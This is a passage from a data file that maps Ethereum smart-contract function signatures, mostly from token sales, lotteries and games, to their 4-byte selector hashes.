"setTransferRate(address,int16)": "0xa09d9c09", "setDefaultTransferRate(uint16)": "0x389755a7", "fromTokenDecimals(uint256)": "0x22a4381d", "totalTokenBalance(address)": "0xf5465992", "TokenDecimals(uint256)": "0x17349ad5", "doesUserHaveBalance(address)": "0xa2c44503", "userTokenBalances(address)": "0xe7328000", "getUserTokenBalance(address,address)": "0x73f8fd4b", "VRChainToken(string,string,uint8,uint256)": "0xb5a8fa80", "getStageData()": "0xa6885e88", "getWalletsData()": "0x92c6bf28", "setStage(uint256,uint256,uint256,uint256,uint256)": "0xb0335ffc", "sendFromGftWallet(address,uint256)": "0x58902cc6", "sendFromBountyWallet(address,uint256)": "0x59923274", "sendFromAdvisorWallet(address,uint256)": "0x587ac47c", "sendFromTeamWallet(address,uint256)": "0x502f2dee", "setGftFundWallet(address,address,uint256)": "0x39fc04f4", "setBountyFundWallet(address,address,uint256)": "0x72c70758", "setAdvisorFundWallet(address,address,uint256)": "0xa7b0793b", "setTeamFundWallet(address,address,uint256)": "0x7f56c0b4", "Yinfiniti()": "0x26e5afdf", "SafeTokenTransfer()": "0x24c6ef60", "RecycleToken()": "0x3c73db77", "UraniumPlus()": "0xe75f02e3", "ParadiseTokenSale(address,uint256,uint256,uint256,uint256,uint256,uint256,address,address)": "0x235977ca", "ParadiseToken(address)": "0x430d6eb2", "unsetWhitelist(address)": "0xdd238603", "unsetBlacklist(address)": "0x1ee2e3cf", "_roundDivision(uint256,uint256,uint256)": "0xc4749079", "_getRoundedPrice(uint256)": "0x6ee7826f", "storeNumber(uint256)": "0xb6339418", "SanchitToken()": "0x7b9c4756", "LottoNumberTest()": "0x883a3ea8", "randomNumber(uint8,uint8)": "0x9cad74b0", "addTicket(uint256,address)": "0xeccb6bd0", "buyTicketTest2(bytes)": "0xb8e920de", "getActives(uint256,address,address)": "0x28331152", "getActiveListLength()": "0xcca78d53", "getPlayeds(uint256,address)": "0x2553ac0d", "getAddressPlayNumber(uint256,uint256,uint256)": "0x606a405e", "airdropWallet()": "0xa14779c9", "minVal()": "0xf14053ad", "getPresaleNumber()": "0xb703c75a", "weekPotLeader()": "0xfa6140dd", "publisherAddress()": "0x36516a8a", "saleWalletAddress()": "0x884ae10b", "feePercentageMax()": "0xe09ee57f", "volumeType3()": "0x3fc7e3d5", "maxGamesPerBlock()": "0xe5d0713b", "sendOwner()": "0xf3a49f90", "identityEthAddress()": "0x92e41c69", "dailyRelease()": "0x990386e8", "tokenBuyersAmount()": "0xaaed3c7d", "angelTime()": "0x57adc83a", "getCountHolders()": "0x34a4a527", "currentDayRate10000()": "0x40799f4c", "token_ratio2()": "0x4553fd4d", "admin_account()": "0x2c767201", "SAFE_PERIOD()": "0xc55fb39f", "getCurrentBonusPct()": "0x2a3de92f", "m_ETHPriceLastUpdateRequest()": "0x6c14f2d1", "tokenController()": "0xeddd9d82", "week_in_blocs()": "0xe8d375fe", "withdrawalValue()": "0x973dbfb7", "numberOfCommittees()": "0x69306f24", "bntToken()": "0xaf6c0f60", "lockUntil()": "0x3c78929e", "digix()": "0x4e52678e", "assignedAmountToPrivateEquityFund()": "0x8835097d", "ownerDividend()": "0xcb3ebec2", "USDcRaised()": "0xd5b4ea20", "toggleCrossForking()": "0x6c049b89", "carTaxiTokenAddress()": "0x1e550ca2", "saiTub()": "0x89dcd64f", "totalEth()": "0x3c3c9c23", "RATE_DAY_7()": "0x8121ddd7", "difficultyAdjustmentPeriod()": "0xf01551f6", "yearlyBlockCount()": "0x6598afb9", "startICOStage8()": "0x178ab6bb", "tapFab()": "0x6411273f", "FOUNDERS_VESTING_CLIFF()": "0x31a76bca", "ANGEL_ADDRESS()": "0xdfb0fb28", "tokenCreationMinPayment()": "0xcdc86ec4", "stepDuration()": "0x4a4e5776", "startBlockTimestamp()": "0xac3dc9aa", "crowdEther()": "0x23f02f56", "sellEndTime()": "0x1ee45da0", "eighthTeamWithdrawal()": "0x13a517bf", "numberOfPingsAttempted()": "0x7288b0a9", "maxTimeRemain()": "0xc53b9c04", "allowedTransferWallet()": "0x4d1b93b3", "whiteListMinAmount()": "0x14cddf9e", "_START_TARGET()": "0xdc9590f0", "CONTRIBUTION_START()": "0x92b03120", "replacesOldContract()": "0x6678887f", "minimumPayout()": "0x1e78cfe1", "PRE_ICO_SINCE()": "0x09a7dd17", "solveTime()": "0x4f25d6dd", "deposit_fee()": "0x55e6fc50", "EXP_18()": "0xd46ea4a4", "ListNotValidated()": "0x2e65280d", "emergencyPaused()": "0x27c830a9", "tokenTimelock()": "0xbba52516", "tokenSaleResumedTime()": "0xa63aeed9", "reservedFund()": "0x8399f93f", "stage_3_TokensSold()": "0x09ae2943", "CENT_DECIMALS()": "0x7c652e26", "acm()": "0x7338ddcc", "startingTimestamp()": "0x88786272", "gracePeriodStopBlock()": "0xbb4cbd0b", "FUND_FRAC_BOT()": "0xdd8e668c", "sumICOStage5USD()": "0x5602a812", "last_jack()": "0x2e80a85d", "totalSupplyTeamTokens()": "0x0f917f9e", "HTSupply()": "0x372fc8d3", "accountB()": "0xecb6af21", "buybackPrice()": "0x9c76a6ac", "DATE_ICO_END()": "0xc0c133a8", "nextPoolPercentage()": "0x2b16f1ef", "Rethen()": "0x7259ac60", "goodbye()": "0x75fc8e3c", "finalizePreSale()": "0x7376678b", "maxWeiInvestment()": "0xd82f6a3f", "cf1Wallet2Pct()": "0x4266806b", "tokenSecondPeriodPrice()": "0xa190500a", "ourTEAM()": "0x6d510a64", "product2_pot()": "0x70b57415", "mangeFundAmount()": "0xb04d6638", "claimingFee()": "0xe738d2b3", "fourthExchangeRatePeriod()": "0x92dcf35d", "totalDistributions()": "0x163db71b", "finishMintingStruct()": "0xbb7dd72d", "sellable_tokens()": "0xaf0062e4", "saleStartSecondDayEnd()": "0x7d4c4a04", "MjolnirWebsite()": "0xbdd3abd9", "songTitle()": "0x089a15e4", "verifiedUsersOnlyMode()": "0x6da3cd1a", "contractExecuted()": "0x26487265", "no_of_tokens()": "0x59a29c6f", "minimalPaymentInWei()": "0xba285f5d", "dogCore()": "0xe4504f62", "CPCEIco()": "0xb7b4ceb3", "fundedAmount()": "0x820a5f50", "ownerCredited()": "0xc44a2a10", "DATE_OPEN_ON_FLOOR()": "0x81f8658a", "secondTokenCap()": "0xf91c022b", "tokensBankPartners()": "0xe182fd01", "MARKETING_POOL_ADDR()": "0x6a4987dc", "finalizeRefunding()": "0x86356ab9", "ico2ndPrice()": "0xb8bcf6c9", "strFundDeposit()": "0xc7423f26", "founderTokensAvailable()": "0x5d8dd304", "getInitBlock()": "0x07ac15e2", "exchangeOldVersion()": "0xe45648ac", "scientists()": "0x255e444e", "maximalInvestment()": "0x10f0c4da", "crowdsaleTokenBalance()": "0xbe45cdb8", "numSubmissions()": "0x77e19824", "maxContributionAmountContract()": "0x89a4931d", "PRCT_BOUNTY()": "0xfa6ad04c", "legal()": "0xe377ac31", "erotixFund()": "0x1ef31b0d", "limitPreSale()": "0xe6d44122", "numDonors()": "0x9034b427", "completedAt()": "0x38771242", "lastTaskIndex()": "0xd5c655c9", "BIZDEV_WALLET()": "0x4c1e4169", "TOKEN_RATE_10_PERCENT_BONUS()": "0xfa878e8f", "rewardNumerator()": "0xcdd432d0", "battleFee()": "0xc7f42c64", "counter()": "0x61bc221a", "constantname()": "0x31c9472a", "isPreIcoDate()": "0xe1ee9a3d", "allocatedEth()": "0xb19a4540", "shiftcashToken()": "0xc750938e", "rewardsWithdrawalProposed()": "0x21338d1b", "publicSaleAddress()": "0xc4215398", "totalReservedAndBonusTokenAllocation()": "0x9743ad98", "FOUNDERS_TOKENS_PERCENT()": "0x53e9574a", "icoSupply()": "0x4e8127f6", "DISTRIBUTED_STATUS()": "0x05e24a93", "TroneriumSupply()": "0x201bafee", "withdrawFreeAuctionBalances()": "0x1f807736", "PRICE_PRESALE()": "0xafa6c735", "PRESALE_THIRD_DAY_START()": "0x18c5bddc", "accountWithUpdatePermissions()": "0xf25aed54", "tokenWinRatio()": "0x7ea5d50e", "lockChanges()": "0x3c58d378", "VESTING_CLIFF()": "0x63f3dbe5", "fidaTokenAddress()": "0x1769511c", "freezeTransferToken()": "0x1300cc41", "coinIssuedAdvisor()": "0xabb9e0bf", "CROWDSALE_SHARE()": "0xd9719e56", "lotteryAddress()": "0x3beedf6d", "minimumWei()": "0xe0e267e5", "priceT1()": "0xa9ea1896", "totalPrice()": "0xab0d92dd", "FACTOR_10()": "0x97eede11", "MIN_INVEST()": "0x1b85aa49", "PLATFORM_DEVELOPMENT()": "0xd24ef4f3", "ClaimReward()": "0x79372f9a", "checkPresaleBalance()": "0x22384945", "parityOwner()": "0x4c433843", "unlockFounder()": "0xbb389952", "initialTraining()": "0xb944ef3c", "tokensleft()": "0x2afe4c37", "liquidationThresholdPercent()": "0x320d2fa0", "transferIsPossible()": "0x7466b2d0", "level_8_percent()": "0xbbf02b00", "FLKDForGas()": "0xe833bb53", "lifetimeDeposits()": "0xc8ce2fec", "START_PREICO_TIMESTAMP()": "0xd9663f6a", "preSaleStartDate()": "0x5055225f", "maxAmountICO()": "0x32dae2a5", "paymentWalletAddress()": "0xaea398da", "setMinesPrice()": "0xd13ea9ca", "MIN_INVESTMENT_PHASE1()": "0x94d453db", "mainwallet()": "0xc1468587", "weisMinInvestment()": "0x69b492f9", "missedVerificationSlashAmount()": "0x32b5b2d1", "REIMBURSABLE()": "0xb86ec38f", "UNLOCK_PHASES()": "0x3d160e0b", "endBetRed()": "0x8f049de5", "hijackPrice()": "0x70544eb9", "supportAddress()": "0x0f6d37d6", "Descript()": "0x733452bc", "refundNonKYCInvestor()": "0x6968ce29", "newSeed()": "0x9b0ec5ae", "riddle()": "0x56049a86", "alreadyAutoAirdropAmount()": "0x363bc3a2", "minterChangeable()": "0xf0ba23e6", "lockedPeriod()": "0xb3d6e119", "ourLastJackpotWinner()": "0x0e366cbf", "HackContract()": "0x9b9a09a6", "milion()": "0xf2711812", "hardCapAmount()": "0xcf054fb2", "bonusVestingPeriod()": "0xe8665638", "docIndex()": "0x392c623e", "maxRecords()": "0x7b0a3a8d", "hookOperator()": "0xe3b460c9", "CoinsLimitUnalterableInteger()": "0xf7cb5709", "endTimeIco()": "0x45cc50ce", "COLOR_CUSTOM()": "0xf7e0bc92", "presaleBonus()": "0x99cb0823", "canUpdateAmountToTakeAsRake()": "0x6b2e36b0", "stepTwoEndTime()": "0x775915ce", "RATE_CORNERSTONE()": "0xfa51ae86", "addressesLength()": "0x0150b530", "mintingGoal()": "0xb3e33a74", "sponsorValue()": "0x9777487d", "soldForFirst()": "0xbbc0ebbf", "bountyTokensWallet()": "0x99cd211d", "VESTING_AMOUNT()": "0x9b3b24ba", "targetDiscountValue1()": "0xfa849243", "bets_total()": "0xf3ddb946", "getMax(uint8[])": "0x9ed4ad43", "basisPointsRate()": "0xdd644f72", "subscriptionCounter()": "0x903a8298", "DECIMAL_INDEX()": "0x6ce27c7b", "maxDropsPerTx()": "0x03a19a4f", "startBlockjack()": "0xd50b65d7", "fairsale_protectionOFF()": "0xbbd53bf7", "reserveNIMFAAddress()": "0x651bc2fb", "MAX_TOTAL_TOKEN_AMOUNT()": "0xa89c5be0", "gameStart()": "0x3218b99d", "totalPostIcoContributorIds()": "0x936bbf9a", "winnerPaid()": "0xf38780e2", "allMilk()": "0x9b1f46cd", "_futureSupply()": "0xaec3ab53", "listing()": "0xbc7c55ed", "preSaleBonus1Percent()": "0x7074c091", "isBurned()": "0xc34da17c", "whitelistCount()": "0xf2624b5d", "burnPercentage100m()": "0xa0edcd7a", "MoyOpenDistribution()": "0xfd8d4bff", "etherdelta()": "0x6d64694f", "teamTokensReleased()": "0xcd881742", "firstMaxAmount()": "0x477af741", "maxprice()": "0xfae8529a", "PRICE_STAGE_ONE()": "0x8fd712ae", "c_preICOBonusPercent()": "0x662e4db0", "noOfTokenAlocatedForSeedRound()": "0xf420977d", "initialSeed()": "0xe739a4fe", "TAXRATE()": "0xb2923cff", "ethMultisigWallet()": "0x7ac02331", "ADVISORS_SUPPLY_LIMIT()": "0xc95c67dc", "EnddateICO()": "0x1391c5f8", "startLockTime()": "0xdf155488", "refPercentage()": "0xe5c46869", "RATE_SOFT()": "0xd2901c47", "mintAddress()": "0x425d4980", "lifeCoin()": "0x93559bc6", "maxSaleNum()": "0x95a4f76d", "hodlerTimeStart()": "0xbe2b1047", "marketWine()": "0x0b2a6c70", "toteLiquidatorTransferComplete()": "0x8f9d390a", "coinsIssued()": "0xee45487b", "REB()": "0x0c5ed9d5", "recalcTokenPrice()": "0x7102f74d", "instContWallet()": "0x2458f679", "LifeFactor_v()": "0x13419be3", "closeUp()": "0xf3236460", "lastBlock_a2Hash_uint256()": "0x199326cb", "preSaleTime()": "0x25a30145", "frozenPool()": "0xeb44bb04", "customText()": "0x28171882", "minRequiredBlockQueueTime()": "0xffb05c6f", "partnerSaleTokenPrice()": "0xe75dcb19", "poolCapUSD()": "0x6d6caeb2", "STARTING_TURTLES()": "0xe3ea67d4", "escFund()": "0x3ea14a4f", "getTotalSoldTokens()": "0x59be5e45", "etc()": "0x99fd12f6", "IADAddress()": "0x904d3f47", "endSeedStage()": "0x722c885a", "brideVow()": "0xb7f43a63", "Apply_Store_Id_Fee()": "0x876588b8", "millRaised()": "0x0d2218d6", "changeIsPayableEnabledForAll()": "0x3b078de3", "FOUNDER_WALLET()": "0x153faf2c", "ransom()": "0x0cd3c7f7", "publicReservedToken()": "0xe1f82d60", "miscNotLocked()": "0x59d3dad9", "airDropPayableMoney()": "0xacee57e1", "developmentWallet()": "0xc04a5414", "getGameChance()": "0x729e6f2b", "DEVELOPER_FEE_PERCENTAGE()": "0xb1dbb87a", "XFMSold()": "0x34574ff3", "tier2()": "0x3806153e", "numberOfPunksReserved()": "0xaec4e0bb", "description2()": "0x3365aa3b", "requestMinimum()": "0x74ff2324", "ELF()": "0xd843dcbb", "GetAccountIsFrozenCount()": "0xe616c975", "ETHfund()": "0x11a98193", "sgtExchanger()": "0xad344bbe", "SPEED_STAT_MAX()": "0x6b14dfe1", "winPercent()": "0x9e639858", "GICT()": "0xbf082e38", "indexAccount()": "0x2813acc9", "BANKOIN()": "0xabc45ddc", "receiveTokens()": "0x680e6c9b", "Gamblr()": "0x21e76826", "ZSYCoin(uint256,string,string)": "0x82964696", "drop(address,address[],uint256)": "0x1d833aae", "AirDrop(uint256)": "0xdef871ef", "removeShare(address)": "0xcb92042c", "addShare(address)": "0x703eb724", "distributeToken(address[],uint256[])": "0x659de63b", "BITXOXO()": "0x16b65fac", "DepositContract()": "0x1558687a", "changeDeDeStorageAddress(address)": "0xd554f8b4", "changeDeDeAddress(address)": "0x155897cc", "changeMyAddress(address)": "0x1833b7c6", "sweep(address,address,uint256)": "0x62c06767", "createContract()": "0x412a5a6d", "DepositMasterContract(address)": "0xd42c334e", "MetadollarOption()": "0x9be5b3b1", "BiyuleCoin(uint256,string,string)": "0x479d29f4", "sendTransaction(address,uint256,bytes)": "0xe5e288e5", "readBytes32(bytes,uint256)": "0xaf500fb7", "setExpirationTime(uint256)": "0xc0cc365d", "removeDelegate(address,address)": "0x020d308d", "addDelegate(address,address)": "0xe909ebfa", "isDelegate(address,address)": "0x5fec5d0b", "wasDelegate(address,address,uint256)": "0x10861f40", "OncoToken()": "0x15b23e47", "isAdministrator(address)": "0x0a2eb301", "GUS()": "0xaf9890aa", "setPrice(uint256,uint8)": "0x96383c04", "EtherPrice(uint256,uint8)": "0xe8cfc40d", "Unicoin()": "0x1a2eaaeb", "SuccessLife()": "0x9db1cafa", "releaseManyStakes(uint256[],address[],address[],uint256[])": "0xdc5fe349", "releaseStake(uint256,address,address,uint256)": "0xff9c8437", "stakeToMany(uint256[],uint256[])": "0x97e8e520", "stake(uint256,uint256)": "0x7b0472f0", "Grow()": "0x28ecb74e", "withdrawM5()": "0x8449d772", "getM5Reward(address)": "0x99e8f303", "finishUpgrade()": "0x340df28f", "upgradeM5(address,address)": "0x0817e5c1", "upgradeM5Logic(address)": "0xe1bf4f50", "upgradeM5Token(address)": "0xef3cdb2f", "isUpgradeFinished()": "0x97f3c21e", "upgradeManager()": "0xde154761", "M5Logic()": "0xf61b7483", "M5Token()": "0x694094fd", "pendingGDPOracle()": "0x656f64f5", "GDPOracle()": "0xf2e1be50", "setNegativeGrowth(int256)": "0x00c56675", "setPositiveGrowth(int256)": "0x2e298f75", "claimOracle()": "0x48f36144", "transferGDPOracle(address)": "0xb5776339", "Satum()": "0x0fc6ed30", "balancesImporter4()": "0xcabf8493", "MyAdvancedToken7(uint256,string,uint8,string)": "0x197c418f", "AUEBToken()": "0x8f984115", "BucoTestCoin()": "0x4d86b498", "_createMobster(string,address,uint256,uint256)": "0xcc07a94d", "setLethalBonusAtHits(uint256)": "0x9ea58112", "createMobster(string,uint256,uint256)": "0xaa2f7494", "MobSquads()": "0x9f881e0b", "KissMe(uint256,string,string)": "0x07587fa3", "KM(uint256,string,string)": "0x814a78f4", "updateTokenAddress(address,address)": "0x24206c2e", "SMGC()": "0xd0578df9", "getMiningReward(bytes32)": "0x77d55755", "medalBoostAndBurn(uint16,uint64)": "0x96b9a9d0", "checkExistsOwnedMedal(uint64)": "0x46538e07", "erectBarrier(uint16,uint8,uint8)": "0x87c50df5", "setVariables(uint8,uint8,uint8,uint8,uint256)": "0xc49fea77", "DataContacts(address,address)": "0x074f0a22", "Cloudcoin()": "0xd2d26edc", "activate(address,uint256,uint256,uint256,bool,bool)": "0xfdfcb425", "TokenTrader(address,address,address,uint256,uint256,uint256,uint256,bool,bool)": "0x919d8bb2", "createTradeContract(address,address,uint256,uint256,uint256,bool,bool)": "0xc4cf8a40", "LarsGeburtstagsgruss()": "0xb4cdeb78", "SIEChain()": "0x7f56c072", "setSellRate(uint256)": "0x8e0b017d", "sellAllDolAtOnce()": "0xb940db1a", "GATcoin(uint256,string,string,uint8)": "0x3634b376", "SEXcoin()": "0xae76145d", "BTKToken()": "0x75a0ff93", "DongriToken(uint256)": "0x9bab3988", "tryRefund()": "0x6ea16f3a", "tryDeposit()": "0xc1c5de4a", "fallbackPayout()": "0xc8af1538", "refundAlienDeposit(address)": "0x088f87e0", "batchAddToWhitelist(address[])": "0x2db6fa36", "setRequireWhitelistingBeforeDeposit(bool)": "0x94e2662f", "updateMinDeposit(uint256)": "0x9a7be471", "updateMaxAcceptedDeposits(uint256)": "0xc7395151", "stateSetOver()": "0xd6636307", "stateSetLocked()": "0xd9fb6963", "stateSetOpen(uint32)": "0xc1707f66", "vestTokens(address,uint256,uint256)": "0xd1ef4e91", "EthereumTravelToken(address,uint256,string,string)": "0x9851553b", "sendFunds(address,uint256,uint256)": "0x2ae8a2d2", "getJackpotFee(uint256)": "0xd2b4a460", "STAKE_MIN_AGE()": "0xe835dd27", "isEthernautsStorage()": "0xae61fcda", "namiPresale()": "0x90a9cc02", "tradingData()": "0xa85f5c2e", "preICOFreeBonusPercent()": "0xa7f7417d", "bouncyCoinToken()": "0xdcd320a0", "initialIssueMinting()": "0xb727b194", "maxTrophies()": "0xaa79bc02", "airdropTotalSupply()": "0xd25a5be9", "edgePerPosition()": "0xf0ec94cf", "WITHDRAWAL_SCALE()": "0xab4b4def", "tokenAdvisor()": "0x8bfa4b4e", "ifoodCommunity()": "0xe2c86092", "canonizedParameterizer()": "0xc34fb5ca", "SEELE_TOTAL_SUPPLY()": "0x1cfef64c", "Foodiecoin()": "0x3801cde7", "totalRuneWithdrawn()": "0x7ba46004", "FEE_DEV()": "0xd54839bf", "BONUS1()": "0xc3e6ea31", "End9()": "0x0915db6d", "eth_price()": "0x27bb3d0f", "personalCapEndAt()": "0xc68098d9", "totalWallets()": "0x977d2c45", "contractMessage()": "0x561337eb", "preCrowdsaleStartTime()": "0x694dcecc", "previousSnailPot()": "0x3f8a4c13", "totalRewardThisYear()": "0x4c610ba4", "safeLastDate()": "0xa7fbe7ad", "addChunk5ToWhiteList()": "0xdc903eb7", "token_unlock_time()": "0xe9e48842", "CandyDropIsOpen()": "0x2c5e52d1", "activation()": "0x3629c8de", "contributorsVestTokenAllocation()": "0xe88ab341", "deathData_a18()": "0xe72f99ac", "lastBlock_f10()": "0x885a5ec2", "numOfCommon()": "0x1ac96124", "pricePerTicket()": "0xe9874106", "_level()": "0x8b9e4768", "nextMint()": "0xcf665443", "depositRate()": "0x7e74a1ed", "amountwon()": "0x7ce335ac", "entitled()": "0x52380eba", "nextRoundDuration()": "0xd30cad77", "priceCreatingChannel()": "0xe2651539", "ROLE_MANAGER()": "0xf5b944eb", "minAmountWei()": "0x3feced03", "ticket1price()": "0xeb4999f4", "bountyTokensAddress()": "0x88ea70ee", "minimalInvestment()": "0x19edc0aa", "firstStageEndsAt()": "0xc67acceb", "Start2()": "0xf85cb0b5", "QUARTERLY_RELEASE()": "0x8efd4c75", "trashedTokens()": "0xb1a11c92", "addressPeople()": "0x90dcba22", "startingPoint()": "0xba3dc67c", "firstStartTime()": "0x0693ee6e", "minJackpot()": "0x911d0189", "newMembers()": "0x9ae38844", "poolsToCreate()": "0xbc22f570", "GetMainAddress()": "0x10442a1b", "numberOfBets()": "0x2ca8c6d3", "customBonus()": "0x1dd16db6", "min_goal_amount()": "0x28d3e3e1", "unlockedAtBlockNumber()": "0x94974aea", "disputeLength()": "0x105d9e37", "percentForBounty()": "0x82d9ac39", "yearLength()": "0x9ee8fa93", "currentType()": "0x008c8920", "priEtherReceived()": "0xfd94c80b", "earlyStageSetting()": "0x851c27de", "needFightToAdult()": "0x8cb18ef6", "getMaxPriceSale()": "0xdc13f85f", "INITIAL_RATE()": "0x4dbac733", "TripCoinTeamSupply()": "0x00a5e715", "CREATORS_WALLET_ADDRESS()": "0x6e680ee7", "_firstLevelEth()": "0x9dda456a", "preSaleSecondBonus()": "0x4e938539", "nextStarIndexToAssign()": "0x6953ba9a", "cryptoStorage()": "0x0800a05f", "wpp()": "0xa380dcb9", "tokenReward()": "0x6e66f6e9", "_api_PlaceBet()": "0xaf9efd4c", "crownedTime()": "0xba9072ea", "fundariaShare()": "0x36e05d94", "num_tickets_current_round()": "0x9db4372c", "blockLock()": "0xe8836183", "REFF_TOKENS()": "0xe30637d6", "etherLimit()": "0xf33280b2", "whaleBalance()": "0x30bf2d3e", "m_ETHPriceUpdateInterval()": "0x8b629cbc", "weiPerBtc()": "0x09990611", "PRCT100_R_TEAM()": "0xc3392f25", "m_analytics()": "0xf4f59992", "migratestate()": "0xea16cee5", "closeEarlyAdopters()": "0x0c26ac30", "destEthFoundation()": "0x503eb429", "claimedTokensWallet()": "0x09d60db1", "certifierAddress()": "0x49cf2eae", "escapeDestination()": "0xc7238af7", "price_exponent()": "0x0c64a739", "getCurrentBid()": "0x7f1ecfe0", "adminClaimAirdropMultiple2(address[],uint256)": "0x033a010b", "CSES1()": "0xf39d9f19", "PisticciCash()": "0xd04f0535", "RND()": "0x86994b71", "multiTransfer(address[],address[],uint256[],string)": "0x5f4874e4", "ValeoTestToken()": "0x9c83b0a1", "TCT(string)": "0x2151f9a0", "WanChainToken()": "0xf5519e8d", "ArollaToken()": "0x7579f2c9", "RFUDToken()": "0x66b668de", "heatUp(address,uint256)": "0x64832c4c", "getUrlCountOf(address,address)": "0x013e7c35", "getUrlAtIndexOf(address,address,uint256)": "0xce39976d", "sendFyle(address,address,string)": "0x6d492f54", "Fyle(string,string,uint8,uint256)": "0xb9ce10d5", "refundBond(uint256,address)": "0xc54996b7", "getDepositBalance(address)": "0xed05ae78", "FuckYou()": "0x89b540aa", "NextBabyIs(address,uint256)": "0x32a89e50", "initWallet(address)": "0x9da8be21", "allocatePrivatePresaleTokens()": "0x958993a5", "getPrivatePresaleFundersCount()": "0x0162f799", "SampleToken(uint256,string,uint8,string)": "0xe39253e6", "setConfirmAddr(address)": "0x37b0f257", "updateWallet(address,address)": "0x4a6bb4a5", "updatefee(uint256)": "0xa0135b2b", "payEther(address[],uint256[])": "0x5d036c8b", "Tabo()": "0xc7963ae8", "MIRCOOToken()": "0x5c81b8f9", "getLeaderboard()": "0x6d763a6e", "addLeaderboard(string,uint256)": "0x4bea4df7", "burnEnergyAttributionToken(address,uint256)": "0x3913d6e0", "createNew(uint256,uint256,uint256,uint256,bool,uint256,uint256,uint256,address,address)": "0x29055edd", "isHealthy()": "0xe4020804", "getWalletInfo(address)": "0x7d5c1914", "getWalletInfoByIndex(uint256)": "0x31e6a707", "adminAddWinner()": "0x3b17ebb1", "adminDropETH()": "0x356f55b7", "LMITOKEN()": "0x725c8bdd", "Fortnitecoin()": "0x24ea8d1a", "getMetaDataCount(address,bytes32)": "0x4116dfc3", "saveMetaData(address,bytes,bytes32,bytes32,bytes32,bytes,uint32,uint256,uint256,bytes,uint256)": "0x1ec68b92", "saveCarDataTransaction(address,address)": "0xe07d4f6b", "saveMetaData(address,bytes32,bytes32,bytes32,bytes,uint32,uint256,uint256,bytes,uint256)": "0x35cd78b3", "ExchangeEfx()": "0x73c6aa7d", "showMyNumber()": "0x212a850c", "HM(uint256)": "0xffb391fe", "Vlicoin()": "0x98d8d7b4", "createAndEndowC1(uint256,uint256)": "0xd80b1a68", "createC1(uint256)": "0x166bf1b0", "C1(uint256)": "0xdb59190d", "KD0Token()": "0x15d707af", "BerryLake()": "0x2c69ed89", "mintEnergyAttributionToken(address,uint256,string)": "0xb3da4b09", "DuckToken()": "0xd02ea39e", "BFX()": "0x1d7d1f17", "payoutDividends()": "0x44b4d279", "getPlayerEarning(address)": "0xb4944333", "HuuuumanStandardToken(uint256,string,uint8,string)": "0x43d4759f", "getHeader(uint256)": "0x396773b7", "lottery(uint256,uint256)": "0x610b1abd", "WBW(uint256,string,uint8,string)": "0x0cef7d5a", "unverifyAddresses(address[])": "0x19a0e572", "verifyAddresses(address[])": "0x36e520bc", "_unverifyAddress(address)": "0x6942eff7", "_verifyAddress(address)": "0x8d98ee43", "removeAddressesFromBlacklist(address[])": "0x32258794", "addAddressesToBlacklist(address[])": "0xca73419e", "_removeFromBlacklist(address)": "0xa56b60ee", "_addToBlacklist(address)": "0xcad4ae37", "SingularityTest20()": "0xb632d2e0", "calldatacpy(uint256,uint256,uint256)": "0xac92f4ae", "Joules()": "0x2fc5a8ec", "Brokenwood()": "0x719ce353", "P2E()": "0x6f9c6194", "Trupee()": "0x1c533a09", "arrayTestMulti(address[],address[],uint256[])": "0xdb2ea20e", "arrayTest(address[])": "0xda69f1c8", "PauseOff(uint8)": "0x34766ecc", "PauseOn(uint8)": "0x3e3756db", "ChangeEmissionRateCoefficient(uint8)": "0x9bf6deaf", "ChangeEmissionGrowthCoefficient(uint8)": "0x410090db", "FinalTokenToken()": "0x0c0bea5c", "Dagelan()": "0xa7cadc50", "Gemstones()": "0x0cb296ae", "CarRegistry()": "0xffe0fa66", "updateethFee(uint256)": "0x0660b8b2", "allocatetokensAndWL(address,uint256,uint256)": "0x34a4b10b", "batchAllocate(address[],uint256[],uint256[])": "0x355d7d03", "sendTokensAfterBuy(address,uint256,uint256)": "0xbaecd693", "AvenceToken()": "0x01289e3a", "OpenPollCoin()": "0x17b7c328", "BreakToken()": "0x3ee5f2e4", "NewContent(bytes32)": "0x7cb46307", "withdrawBSAFE(address,uint256)": "0x988b590f", "startSTO()": "0xad5cd9e7", "startPreSTOSale()": "0xcc1ef080", "_tavern(uint256)": "0x33291126", "Initialize(string,string,uint256,uint256)": "0x03379e7f", "isAccountFreeze(address)": "0x1336cff6", "DefensorWallet(uint256,string,string,uint8)": "0x00ff6262", "TokenFactoryAirdrop()": "0x14aedbee", "getCeiling()": "0xb0128c08", "getFloor()": "0xc11808da", "EthereumPocket()": "0x5569e58c", "SarahCoin()": "0xd7b701b6", "JinGangCoin()": "0x923a2e61", "checkJackpot(address)": "0xc8ce122b", "setJackpotFactor(uint256)": "0x6cf9bbf8", "Pyrgressive()": "0xa4a47582", "getFeesAvailableForWithdraw()": "0x9c499b53", "getGraffiti(uint256)": "0x3d7f6536", "_addGraffiti(uint256,string,string)": "0x7d4d42c5", "_fYou(address,uint256,string,string)": "0x593af4f1", "paintGraffiti(uint256,string,string)": "0xd1d6e44a", "giantFYou(address,uint256)": "0x6ed2d8c6", "fYou(address,string,string)": "0x6fc6df36", "ALDEToken(uint256,string,uint8,string)": "0x685adf5e", "IWABOO()": "0x883fdd6f", "setHash(string)": "0x1ed83fd4", "Lightning()": "0x1214ab82", "AAACoin()": "0x3fb48c4c", "maxTotalSupply()": "0x2ab4d052", "availableBalanceOf(address,address)": "0x2a7575ee", "setGenesisAddressArray(address[],address)": "0xaa98a41a", "currentEthBlock()": "0x09f6c607", "EvenCoin()": "0x37f33bd5", "setMintingOracle(address,address)": "0x26fe18e2", "changeTechAccountAddress(address,address)": "0xa0577762", "revertTokensByKYC(address,address)": "0x79f0cd62", "verifyKYC(address,address)": "0x87b73795", "lockAddressByKYC(address,address)": "0xd5cfc01b", "Jump()": "0xe60dbaae", "Wanchain()": "0xf32fc856", "Allinone()": "0xd3c7ca2f", "PwdHasBeenSet(bytes32)": "0x65d61ad6", "Setmyadress(address)": "0x3f3c51c3", "SetcashOutTime(uint256)": "0xa8276d97", "DebugHash(bytes)": "0x42fc63be", "CashOut(bytes)": "0x25f885d0", "JATICO()": "0xb970e3d0", "TEACHTokenToken()": "0x46c6f325", "getReference(bytes32)": "0x427f9614", "setReference(address,address,bytes32)": "0xdaff0093", "main(address,address)": "0x49c37f8c", "NXE_Coin()": "0xd14ebab3", "getDepositInstanceCount()": "0xad295b26", "checkInfo(uint256,address)": "0xabfcb6f8", "getAllDepositors(uint256)": "0x14b08b4d", "getInstanceMetadata(uint256)": "0x455052b9", "changeDepositorLimit(uint256)": "0xc1554658", "claimAll(uint256)": "0x6930fd2a", "refundFromSeveral(uint256,address[])": "0xfef4b969", 